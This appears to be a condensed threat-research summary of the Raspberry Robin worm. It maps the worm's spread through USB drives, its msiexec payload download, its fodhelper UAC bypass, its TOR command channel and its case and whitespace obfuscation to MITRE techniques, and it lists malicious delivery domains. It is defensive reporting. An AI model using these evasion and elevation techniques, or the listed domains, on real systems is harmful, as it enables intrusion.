Threat Research

Raspberry Robin: Highly Evasive Worm Spreads over External Disks

Securonix

Raspberry Robin is a worm that spreads via infected external disks and downloads its payload through msiexec from QNAP cloud accounts, using TOR for its C2 channel. It executes payloads via system binaries (rundll32.exe, shell32.dll) and elevates with fodhelper.exe while evading detection through mixed-case names and whitespace. #RaspberryRobin #QNAPWorm #TOR #msiexec #fodhelper

Keypoints

  • Raspberry Robin propagates by infecting external drives and delivering its payload from QNAP cloud accounts.
  • Initial infection relies on .lnk files or similarly named files with obfuscated whitespace and mixed case to bypass detection.
  • Payload download and execution occur via Windows binaries (msiexec, od bc conf, control.exe) invoked through rundll32.exe.
  • Auto-elevation and UAC bypass are achieved using fodhelper.exe, enabling privileged execution of commands.
  • The malware establishes a TOR-based C2 channel and leverages process injection and system binaries for command and control.
  • Cisco Global Threat Alerts track Raspberry Robin under the RaspberryRobin threat object with documented detections.

MITRE Techniques

  • [T1091] Replication Through Removable Media – Raspberry Robin spreads via an external drive. “Raspberry Robin is a worm that spreads over an external drive.”
  • [T1059.003] Windows Command Shell – The malware uses cmd.exe to execute commands from the infected disk. “cmd.exe tries to execute commands from a file within that disk.”
  • [T1105] Ingress Tool Transfer – It downloads its payload after initial execution via msiexec from a remote source. “After delivery and initial execution, cmd.exe spawns msiexec.exe to download the Raspberry Robin payload.”
  • [T1218.005] Signed Binary Proxy Execution: Msiexec – The payload is executed through system binaries including msiexec.exe. “rundll32.exe uses the ShellExec_RunDLL function from shell32.dll to leverage system binaries such as msiexec.exe, odbcconf.exe, or control.exe.”
  • [T1218.003] Regsvr32 – Uses regsvr32.exe as part of the command sequence to load components. “…/a {CONFIGSYSDSN wgdpb YNPMVSV} /A {CONFIGDSN…}”
  • [T1548.002] ByPass User Account Control – fodhelper.exe is used for auto-elevated execution. “fodhelper.exe, which has the auto elevated bit set to true. It is often leveraged by adversaries in order to bypass User Account Control.”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 channel is established through TOR connections. “establishes a command and control (C2) channel through TOR connections.”
  • [T1055] Process Injection – The text suggests process injection given elevated privileges in earlier steps. “likely points to process injection given elevated privileges in previous steps of execution.”
  • [T1027] Obfuscated/Compressed Files and Information – Obfuscation via whitespace and mixed case to evade detection. “excessive whitespace/non printable characters and changing letter case to avoid string matching detection techniques.”
  • [T1036] Masquerading – Mixed-case and obfuscated naming used to blend with legitimate system activity. “On every instance of explorer.exe we see that the adversary is changing the letter case to avoid detection.”

Indicators of Compromise

  • [Domain] Payload Delivery – k6j.pw, kjaj.top, and other listed domains used for payload delivery

Read more: https://blogs.cisco.com/security/raspberry-robin-highly-evasive-worm-spreads-over-external-disks